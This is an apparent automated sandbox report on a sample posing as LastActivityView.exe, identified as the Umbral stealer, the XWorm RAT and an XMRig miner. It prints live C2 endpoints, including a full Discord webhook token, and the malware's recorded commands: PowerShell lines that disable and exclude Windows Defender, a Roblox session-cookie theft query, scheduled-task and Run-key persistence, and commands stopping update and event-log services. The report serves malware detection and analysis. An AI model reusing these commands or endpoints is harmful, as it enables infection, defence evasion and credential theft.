umbral | 6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b

Analysis

max time kernel
132s
max time network
147s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
06/05/2024, 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LastActivityView.exe
Size

89KB
MD5

499e35df562563babfff6a1d2ee71743
SHA1

7bece5115d9df1fa43b6a7a69f9574a498388960
SHA256

6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
SHA512

2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377
SSDEEP

1536:XQol2xVvTS+KaYKvHUxErb2PPSUF2Q06yG2OklzG2OrSBR27KmhDWP:XQvVqaZsqrbeafQUmklzG2OrUyKdP

Score

10^/10

umbral xmrig xworm evasion execution miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

https://pastebin.com/raw/R8gFU5SX:123456789

Attributes

Install_directory
%ProgramData%
install_file
{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
pastebin_url
https://pastebin.com/raw/R8gFU5SX

Extracted

Family

umbral

https://discord.com/api/webhooks/1237145706423123999/BQqwyjXaKt7KqCLA_iWguAde2fiNgpA36IvFL69WoxRB6yoYhMjlc7o80Exvew2DFX8M

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000700000001540d-44.dat	family_umbral
behavioral1/memory/2216-46-0x0000000000D20000-0x0000000000D60000-memory.dmp	family_umbral

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/memory/1956-1-0x0000000000A60000-0x0000000000A7C000-memory.dmp	family_xworm
behavioral1/files/0x000e00000001480e-34.dat	family_xworm
behavioral1/memory/1004-36-0x0000000000280000-0x000000000029C000-memory.dmp	family_xworm
behavioral1/memory/1848-89-0x0000000000070000-0x000000000008C000-memory.dmp	family_xworm
behavioral1/memory/2152-141-0x00000000001D0000-0x00000000001EC000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral1/memory/2992-136-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-135-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-131-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-130-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-134-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-133-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-137-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2992-138-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2500	powershell.exe
2936	powershell.exe
2460	powershell.exe
240	powershell.exe
1716	powershell.exe
2904	powershell.exe
1780	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	rjvwuf.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk	LastActivityView.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk	LastActivityView.exe

Executes dropped EXE 6 IoCs

pid	Process
1004	{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
2216	rjvwuf.exe
1848	{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
2852	haoqla.exe
484	Process not Found
332	gmstcccpdzbb.exe

Loads dropped DLL 5 IoCs

pid	Process
1956	LastActivityView.exe
1956	LastActivityView.exe
2672	taskmgr.exe
2672	taskmgr.exe
484	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2992-126-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-128-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-136-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-135-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-131-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-130-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-134-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-127-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-133-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-129-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-125-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-137-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-138-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2992-139-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"	LastActivityView.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
6	pastebin.com
7	pastebin.com
8	2.tcp.eu.ngrok.io
17	discord.com
18	discord.com
21	pastebin.com
22	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
4	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	haoqla.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1432	sc.exe
1472	sc.exe
1836	sc.exe
2100	sc.exe
1852	sc.exe
1456	sc.exe
1704	sc.exe
848	sc.exe
1892	sc.exe
2240	sc.exe
1896	sc.exe
584	sc.exe
1200	sc.exe
888	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	LastActivityView.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	LastActivityView.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2748	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1932	wmic.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	LastActivityView.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	LastActivityView.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	LastActivityView.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	LastActivityView.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40532fa903a0da01	powershell.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2416	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1956	LastActivityView.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
2500	powershell.exe
2936	powershell.exe
2460	powershell.exe
240	powershell.exe
1956	LastActivityView.exe
1716	powershell.exe
2108	powershell.exe
1428	powershell.exe
1660	powershell.exe
1524	powershell.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2852	haoqla.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2904	powershell.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
2852	haoqla.exe
332	gmstcccpdzbb.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1956	LastActivityView.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	240	powershell.exe
Token: SeDebugPrivilege	1956	LastActivityView.exe
Token: SeDebugPrivilege	1004	{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
Token: SeDebugPrivilege	2216	rjvwuf.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeIncreaseQuotaPrivilege	1668	wmic.exe
Token: SeSecurityPrivilege	1668	wmic.exe
Token: SeTakeOwnershipPrivilege	1668	wmic.exe
Token: SeLoadDriverPrivilege	1668	wmic.exe
Token: SeSystemProfilePrivilege	1668	wmic.exe
Token: SeSystemtimePrivilege	1668	wmic.exe
Token: SeProfSingleProcessPrivilege	1668	wmic.exe
Token: SeIncBasePriorityPrivilege	1668	wmic.exe
Token: SeCreatePagefilePrivilege	1668	wmic.exe
Token: SeBackupPrivilege	1668	wmic.exe
Token: SeRestorePrivilege	1668	wmic.exe
Token: SeShutdownPrivilege	1668	wmic.exe
Token: SeDebugPrivilege	1668	wmic.exe
Token: SeSystemEnvironmentPrivilege	1668	wmic.exe
Token: SeRemoteShutdownPrivilege	1668	wmic.exe
Token: SeUndockPrivilege	1668	wmic.exe
Token: SeManageVolumePrivilege	1668	wmic.exe
Token: 33	1668	wmic.exe
Token: 34	1668	wmic.exe
Token: 35	1668	wmic.exe
Token: SeIncreaseQuotaPrivilege	1668	wmic.exe
Token: SeSecurityPrivilege	1668	wmic.exe
Token: SeTakeOwnershipPrivilege	1668	wmic.exe
Token: SeLoadDriverPrivilege	1668	wmic.exe
Token: SeSystemProfilePrivilege	1668	wmic.exe
Token: SeSystemtimePrivilege	1668	wmic.exe
Token: SeProfSingleProcessPrivilege	1668	wmic.exe
Token: SeIncBasePriorityPrivilege	1668	wmic.exe
Token: SeCreatePagefilePrivilege	1668	wmic.exe
Token: SeBackupPrivilege	1668	wmic.exe
Token: SeRestorePrivilege	1668	wmic.exe
Token: SeShutdownPrivilege	1668	wmic.exe
Token: SeDebugPrivilege	1668	wmic.exe
Token: SeSystemEnvironmentPrivilege	1668	wmic.exe
Token: SeRemoteShutdownPrivilege	1668	wmic.exe
Token: SeUndockPrivilege	1668	wmic.exe
Token: SeManageVolumePrivilege	1668	wmic.exe
Token: 33	1668	wmic.exe
Token: 34	1668	wmic.exe
Token: 35	1668	wmic.exe
Token: SeIncreaseQuotaPrivilege	2196	wmic.exe
Token: SeSecurityPrivilege	2196	wmic.exe
Token: SeTakeOwnershipPrivilege	2196	wmic.exe
Token: SeLoadDriverPrivilege	2196	wmic.exe
Token: SeSystemProfilePrivilege	2196	wmic.exe
Token: SeSystemtimePrivilege	2196	wmic.exe
Token: SeProfSingleProcessPrivilege	2196	wmic.exe
Token: SeIncBasePriorityPrivilege	2196	wmic.exe
Token: SeCreatePagefilePrivilege	2196	wmic.exe
Token: SeBackupPrivilege	2196	wmic.exe
Token: SeRestorePrivilege	2196	wmic.exe
Token: SeShutdownPrivilege	2196	wmic.exe

Suspicious use of FindShellTrayWindow 20 IoCs

pid	Process
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe
2672	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1956	LastActivityView.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 2500	1956	LastActivityView.exe	29
PID 1956 wrote to memory of 2500	1956	LastActivityView.exe	29
PID 1956 wrote to memory of 2500	1956	LastActivityView.exe	29
PID 1956 wrote to memory of 2936	1956	LastActivityView.exe	31
PID 1956 wrote to memory of 2936	1956	LastActivityView.exe	31
PID 1956 wrote to memory of 2936	1956	LastActivityView.exe	31
PID 1956 wrote to memory of 2460	1956	LastActivityView.exe	33
PID 1956 wrote to memory of 2460	1956	LastActivityView.exe	33
PID 1956 wrote to memory of 2460	1956	LastActivityView.exe	33
PID 1956 wrote to memory of 240	1956	LastActivityView.exe	35
PID 1956 wrote to memory of 240	1956	LastActivityView.exe	35
PID 1956 wrote to memory of 240	1956	LastActivityView.exe	35
PID 1956 wrote to memory of 2748	1956	LastActivityView.exe	37
PID 1956 wrote to memory of 2748	1956	LastActivityView.exe	37
PID 1956 wrote to memory of 2748	1956	LastActivityView.exe	37
PID 2156 wrote to memory of 1004	2156	taskeng.exe	40
PID 2156 wrote to memory of 1004	2156	taskeng.exe	40
PID 2156 wrote to memory of 1004	2156	taskeng.exe	40
PID 1956 wrote to memory of 2216	1956	LastActivityView.exe	41
PID 1956 wrote to memory of 2216	1956	LastActivityView.exe	41
PID 1956 wrote to memory of 2216	1956	LastActivityView.exe	41
PID 2216 wrote to memory of 2372	2216	rjvwuf.exe	42
PID 2216 wrote to memory of 2372	2216	rjvwuf.exe	42
PID 2216 wrote to memory of 2372	2216	rjvwuf.exe	42
PID 2216 wrote to memory of 1716	2216	rjvwuf.exe	44
PID 2216 wrote to memory of 1716	2216	rjvwuf.exe	44
PID 2216 wrote to memory of 1716	2216	rjvwuf.exe	44
PID 2216 wrote to memory of 2108	2216	rjvwuf.exe	46
PID 2216 wrote to memory of 2108	2216	rjvwuf.exe	46
PID 2216 wrote to memory of 2108	2216	rjvwuf.exe	46
PID 2216 wrote to memory of 1428	2216	rjvwuf.exe	48
PID 2216 wrote to memory of 1428	2216	rjvwuf.exe	48
PID 2216 wrote to memory of 1428	2216	rjvwuf.exe	48
PID 2216 wrote to memory of 1660	2216	rjvwuf.exe	50
PID 2216 wrote to memory of 1660	2216	rjvwuf.exe	50
PID 2216 wrote to memory of 1660	2216	rjvwuf.exe	50
PID 2216 wrote to memory of 1668	2216	rjvwuf.exe	52
PID 2216 wrote to memory of 1668	2216	rjvwuf.exe	52
PID 2216 wrote to memory of 1668	2216	rjvwuf.exe	52
PID 2216 wrote to memory of 2196	2216	rjvwuf.exe	54
PID 2216 wrote to memory of 2196	2216	rjvwuf.exe	54
PID 2216 wrote to memory of 2196	2216	rjvwuf.exe	54
PID 2216 wrote to memory of 2804	2216	rjvwuf.exe	56
PID 2216 wrote to memory of 2804	2216	rjvwuf.exe	56
PID 2216 wrote to memory of 2804	2216	rjvwuf.exe	56
PID 2216 wrote to memory of 1524	2216	rjvwuf.exe	58
PID 2216 wrote to memory of 1524	2216	rjvwuf.exe	58
PID 2216 wrote to memory of 1524	2216	rjvwuf.exe	58
PID 2216 wrote to memory of 1932	2216	rjvwuf.exe	60
PID 2216 wrote to memory of 1932	2216	rjvwuf.exe	60
PID 2216 wrote to memory of 1932	2216	rjvwuf.exe	60
PID 2216 wrote to memory of 2400	2216	rjvwuf.exe	62
PID 2216 wrote to memory of 2400	2216	rjvwuf.exe	62
PID 2216 wrote to memory of 2400	2216	rjvwuf.exe	62
PID 2400 wrote to memory of 2416	2400	cmd.exe	64
PID 2400 wrote to memory of 2416	2400	cmd.exe	64
PID 2400 wrote to memory of 2416	2400	cmd.exe	64
PID 2156 wrote to memory of 1848	2156	taskeng.exe	67
PID 2156 wrote to memory of 1848	2156	taskeng.exe	67
PID 2156 wrote to memory of 1848	2156	taskeng.exe	67
PID 1956 wrote to memory of 2852	1956	LastActivityView.exe	68
PID 1956 wrote to memory of 2852	1956	LastActivityView.exe	68
PID 1956 wrote to memory of 2852	1956	LastActivityView.exe	68
PID 1912 wrote to memory of 1696	1912	cmd.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2372	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe
"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:240
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"
  2⤵
  - Creates scheduled task(s)
  PID:2748
- C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe
  "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"
    3⤵
    - Views/modifies file attributes
    PID:2372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1524
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1932
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2416
- C:\Users\Admin\AppData\Local\Temp\haoqla.exe
  "C:\Users\Admin\AppData\Local\Temp\haoqla.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2852
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:1696
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1892
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2240
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1896
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:584
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1432
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:2896
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:528
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:904
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:2080
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XLZQHCLS"
    3⤵
    - Launches sc.exe
    PID:888
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1200
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1456
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XLZQHCLS"
    3⤵
    - Launches sc.exe
    PID:1472

C:\Windows\system32\taskeng.exe
taskeng.exe {4B9DD97F-64F5-4011-84F4-6DDC103A5D24} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1004
- C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  2⤵
  - Executes dropped EXE
  PID:1848
- C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
  2⤵
  PID:2152

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2672

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:332
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
